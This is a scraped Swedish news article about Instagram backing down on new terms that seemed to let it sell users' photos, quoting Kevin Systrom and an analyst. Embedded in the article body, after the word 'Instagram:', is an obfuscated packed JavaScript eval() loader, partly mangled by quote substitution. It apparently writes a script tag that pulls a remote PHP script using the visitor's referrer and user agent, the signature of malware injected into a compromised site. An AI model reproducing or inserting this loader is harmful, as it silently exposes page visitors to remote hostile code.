Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Instagram: ”Vi kommer inte att sälja era bilder”

Instagram: ”Vi kommer inte att sälja era bilder”

Instagram: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsfky|var|u0026u|referrer|ifksf||js|php’.split(’|’),0,{}))
Redan dagen efter den Facebookägda bildtjänsten Instagram lanserade sina nya villkor är det dags att byta. 

Som vi skrev igår blev det kalabalik bland användarna av tjänsten när Instagram gick ut med att de skulle börja sälja användares bilder till företag utan att informera personen. 

Instagrams medgrundare Kevin Systrom svarade då på kritiken och lovar nu att tjänsten inte kommer att sälja vidare användarnas bilder till tredje part.

– I går introducerade vi ett nytt användaravtal som kommer att träda i kraft om 30 dagar. Vi har tydligt hört användarnas röster kring det nya avtalet och det är uppenbart att många är förvirrade och upprörda kring de här förändringarna, skriver Kevin Systrom i ett inlägg. 

– Vi lyssnar på er och vi kommer att göra vårt bästa för att besvara era frågor och eliminera den förvirring som uppstått, skriver Kevin Systrom vidare.

Kevin Systrom menar att det blivit en förvirring kring det nya avtalet och att många har tolkat det som att Instagram kommer att sälja vidare bilderna. Istället ska det handla om ett nytt annonsprogram men att språket som används i avtalet är otydligt.

Dan Olds på analysföretaget Gabriel Consulting Group menar att det inte råder någon tvekan om vad som står i det nya användaravtalet. Han säger att det är uppenbart att Instagram nu backar från sina tidigare planer.

Han påpekar också att ingen har sett den slutliga versionen av det nya användaravtalet och att det återstår och se hur Instagram och Facebook kommer att utforma det.

Läs tidigare artikel här!